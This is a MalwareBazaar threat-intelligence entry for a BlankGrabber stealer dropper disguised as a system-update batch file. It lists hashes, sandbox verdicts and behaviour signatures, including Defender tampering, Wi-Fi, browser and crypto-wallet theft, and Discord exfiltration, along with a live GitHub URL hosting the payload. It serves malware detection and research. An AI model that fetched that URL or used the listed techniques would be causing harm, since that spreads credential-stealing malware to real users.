MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


BlankGrabber


Vendor detections: 12


Intelligence 12 IOCs YARA 3 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf
SHA3-384 hash: e12e18d6428fa67e3038599735d0ade97c818e8da9c1d7db219f12bedabdb5acce19b34aadba779734f53b2a3b1cb809
SHA1 hash: 622879209cabfd6c482aea18e7bec9b972e8a2c2
MD5 hash: 486631e567ea15d3d3fff51f9977362e
humanhash: london-artist-spring-fanta
File name:SystemUpdate_6616.bat
Download: download sample
Signature BlankGrabber
Create hunting rule
File size:2'424 bytes
First seen:2025-10-31 07:41:33 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/x-msdos-batch
ssdeep 48:P4DY777x/64TfiSteiu5gXdm4j7GRoE9DbMJmstAt4tp:P4DdSteiu5gXgwGRoE9HkBeGp
TLSH T1FE413D79A1DA0B2882200C70A87BED9213D9E5C7CFB8052BF5C591CA5EB831CCEE45E5
Magika batch
Reporter smica83
Tags:bat BlankGrabber

Intelligence

File Origin
# of uploads :
1
# of downloads :
69
Origin country :
HU HU
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
SystemUpdate_6616.bat
Verdict:
Malicious activity
Analysis date:
2025-10-31 07:43:57 UTC
Tags:
github blankgrabber auto-startup stealer anti-evasion python screenshot discord evasion pyinstaller susp-powershell generic ims-api
Link:
https://app.any.run/tasks/54d04a0b-e689-4297-a84e-83cb8d9dc8b7

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/34875/
Verdict:
Malicious
Score:
97.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69046832706befaf4ecaa4d7
Tags:
dropper shell sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a process
Creating a file
Running batch commands
Creating a file in the %temp% directory
Creating a window
Сreating synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Creating a file in the Windows subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Launching the process to change network settings
Loading a suspicious library
Using the Windows Management Instrumentation requests
Searching for synchronization primitives
Launching a file downloaded from the Internet
Adding an exclusion to Microsoft Defender
Gathering data
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-10-31T04:58:00Z UTC
Last seen:
2025-10-31T16:54:00Z UTC
Hits:
~10
Detections:
Trojan-PSW.MSIL.Stealer.sb Trojan-Spy.Win32.Agent.dffz Trojan-PSW.Python.Blank.sb Trojan-Downloader.PowerShell.Agent.sb Trojan.Win32.Agent.sb Trojan.VBS.Runner.sb Trojan.Win32.Dizemp.sb Trojan.Win32.Agent.sba Trojan.Python.Agent.gen PDM:Trojan.Win32.Generic HEUR:Trojan-PSW.Python.Blank.gen HEUR:Trojan.BAT.Agent.gen
Link:
https://opentip.kaspersky.com/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf/results?tab=lookup
Result
Threat name:
Blank Grabber
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1805582
Signature
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Multi AV Scanner detection for dropped file
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Capture Wi-Fi password
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses WMIC command to query system information (often done to detect virtual machines)
Writes or reads registry keys via WMI
Yara detected Blank Grabber
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1805582 Sample: SystemUpdate_6616.bat Startdate: 31/10/2025 Architecture: WINDOWS Score: 100 93 release-assets.githubusercontent.com 2->93 95 ip-api.com 2->95 97 2 other IPs or domains 2->97 115 Sigma detected: Capture Wi-Fi password 2->115 117 Sigma detected: Powershell download and execute file 2->117 119 Yara detected Blank Grabber 2->119 121 12 other signatures 2->121 13 cmd.exe 2 2->13         started        signatures3 process4 signatures5 153 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->153 155 Suspicious powershell command line found 13->155 157 Encrypted powershell cmdline option found 13->157 159 9 other signatures 13->159 16 powershell.exe 14 17 13->16         started        21 conhost.exe 13->21         started        23 certutil.exe 3 2 13->23         started        25 5 other processes 13->25 process6 dnsIp7 89 github.com 140.82.116.3, 443, 49715 GITHUBUS United States 16->89 91 release-assets.githubusercontent.com 185.199.111.133, 443, 49716 FASTLYUS Netherlands 16->91 71 C:\Windows\Temp\twoman.exe, PE32+ 16->71 dropped 111 Powershell drops PE file 16->111 27 twoman.exe 41 16->27         started        113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->113 73 C:\Users\user\AppData\Local\Temp\~obj_2.bat, DOS 23->73 dropped file8 signatures9 process10 file11 77 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 27->77 dropped 79 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 27->79 dropped 81 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 27->81 dropped 83 22 other files (none is malicious) 27->83 dropped 137 Multi AV Scanner detection for dropped file 27->137 139 Modifies Windows Defender protection settings 27->139 141 Adds a directory exclusion to Windows Defender 27->141 143 3 other signatures 27->143 31 twoman.exe 1 25 27->31         started        signatures12 process13 dnsIp14 99 ip-api.com 208.95.112.1, 49725, 80 TUT-ASUS United States 31->99 101 discord.com 162.159.135.232, 443, 49726 CLOUDFLARENETUS United States 31->101 103 Tries to harvest and steal browser information (history, passwords, etc) 31->103 105 Modifies Windows Defender protection settings 31->105 107 Adds a directory exclusion to Windows Defender 31->107 109 4 other signatures 31->109 35 cmd.exe 1 31->35         started        38 cmd.exe 31->38         started        40 cmd.exe 1 31->40         started        42 24 other processes 31->42 signatures15 process16 signatures17 123 Modifies Windows Defender protection settings 35->123 125 Removes signatures from Windows Defender 35->125 44 powershell.exe 23 35->44         started        57 2 other processes 35->57 127 Uses WMIC command to query system information (often done to detect virtual machines) 38->127 59 3 other processes 38->59 129 Adds a directory exclusion to Windows Defender 40->129 47 powershell.exe 40->47         started        49 conhost.exe 40->49         started        131 Suspicious powershell command line found 42->131 133 Encrypted powershell cmdline option found 42->133 135 Tries to harvest and steal WLAN passwords 42->135 51 tree.com 42->51         started        53 getmac.exe 42->53         started        55 powershell.exe 42->55         started        61 45 other processes 42->61 process18 file19 145 Loading BitLocker PowerShell Module 44->145 147 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 51->147 149 Writes or reads registry keys via WMI 51->149 64 conhost.exe 57->64         started        151 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 59->151 85 C:\Users\user\AppData\Local\Temp\YTQqg.zip, RAR 61->85 dropped 87 C:\Users\user\AppData\...\5404fcfv.cmdline, Unicode 61->87 dropped 66 csc.exe 61->66         started        signatures20 process21 file22 75 C:\Users\user\AppData\Local\...\5404fcfv.dll, PE32 66->75 dropped 69 cvtres.exe 66->69         started        process23
Score:
81%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf/
Verdict:
Malicious
Threat:
Family.BLANKGRABBER
Link:
https://tip.neiki.dev/file/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf
Threat name:
Script.Trojan.Malgent
Create hunting rule
Status:
Malicious
First seen:
2025-10-31 07:42:32 UTC
File Type:
Text (Batch)
AV detection:
2 of 23 (8.70%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=5z7c4bz7qqpgaxdfomqcwuyyabrrj7wuezgbx7w3m5j36id3q3hq._file
Result
Malware family:
blankgrabber
Create hunting rule
Score:
  10/10
Tags:
family:blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx
Link:
https://tria.ge/reports/251031-jjfm4awlfk/
Behaviour
Delays execution with timeout.exe
Detects videocard installed
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates processes with tasklist
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Deobfuscate/Decode Files or Information
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Disables one or more Microsoft Defender components
Downloads MZ/PE file
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
blankgrabber
Malware Config
Dropper Extraction:
https://github.com/gituhxd/uzigitdxd/releases/download/jkjkskskf/twoman.exe
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Base64_Encoded_Powershell_Directives
Create hunting rule
Rule name:Certutil_Decode_OR_Download
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Certutil Decode
Reference:Internal Research
Rule name:obfuscated_BAT
Create hunting rule
Author:@warz_s
Description:Identifies obfuscated BAT files
Reference:https://github.com/secwarz/YaraRules

File information

The table below shows additional information about this malware sample such as delivery method and external references.

BlankGrabber

Batch (bat) bat ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf

(this sample)

BlankGrabber

Executable exe 2137022727f0e39f44133a810588a97e4ed52be5a2f031314483cf25c231cccc

Cape
Cape
https://www.capesandbox.com/analysis/34875/
  
Dropping
SHA256 2137022727f0e39f44133a810588a97e4ed52be5a2f031314483cf25c231cccc
  
Dropping
MD5 9fe81b9e10e35bcd735556238574d300

Comments